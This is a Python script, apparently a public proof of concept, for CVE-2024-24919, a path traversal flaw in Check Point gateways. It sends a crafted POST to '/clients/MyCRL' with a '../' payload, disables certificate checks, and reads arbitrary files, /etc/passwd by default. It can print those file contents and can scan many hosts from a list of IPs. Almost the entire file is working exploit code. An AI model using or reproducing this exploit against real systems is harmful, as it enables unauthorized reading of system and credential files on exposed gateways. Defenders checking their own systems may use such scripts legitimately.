import requests import argparse from colorama import Fore, Style, init import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) init(autoreset=True) def print_banner(): banner = """ ############################################### # CVE-2024-24919 - Check Point PATH Traversal # # @merlax_ # ############################################### """ print(banner) def make_request(host, directory, match_string, show_response): url = f"https://{host}/clients/MyCRL" headers = { 'Host': host, 'Content-Type': 'application/x-www-form-urlencoded', 'Connection': 'keep-alive' } data = f'aCSHELL/../../../../../../..{directory}' try: response = requests.post(url, headers=headers, data=data, verify=False) if match_string in response.text: print(f"{Fore.GREEN}[+] Host VULNERABLE: {host}{Style.RESET_ALL}") if show_response: print(response.text) else: print(f"{Fore.RED}[-] No Vulnerable: {host}{Style.RESET_ALL}") except requests.exceptions.RequestException as e: print(f"{Fore.RED}[-] Error en {host}: {e}{Style.RESET_ALL}") def main(): parser = argparse.ArgumentParser(description='CVE-2024-24919 - Check Point PATH Traversal check by @merlax_') parser.add_argument('-s', help='IP individual') parser.add_argument('-f', help='Archivo con la lista de IPs') parser.add_argument('-d', default='/etc/passwd', help='Directorio a incluir en el request empezando con /') parser.add_argument('-m', default='root', help='String a buscar en la respuesta') parser.add_argument('-r', action='store_true', help='Mostrar la respuesta del servidor si se encuentra el string') args = parser.parse_args() print_banner() if args.s: make_request(args.s, args.d, args.m, args.r) elif args.f: with open(args.f, 'r') as f: for line in f: host = line.strip() if host: make_request(host, args.d, args.m, args.r) else: print("Dame una IP (-s) o un archivo con IPs (-f)") if __name__ == '__main__': main()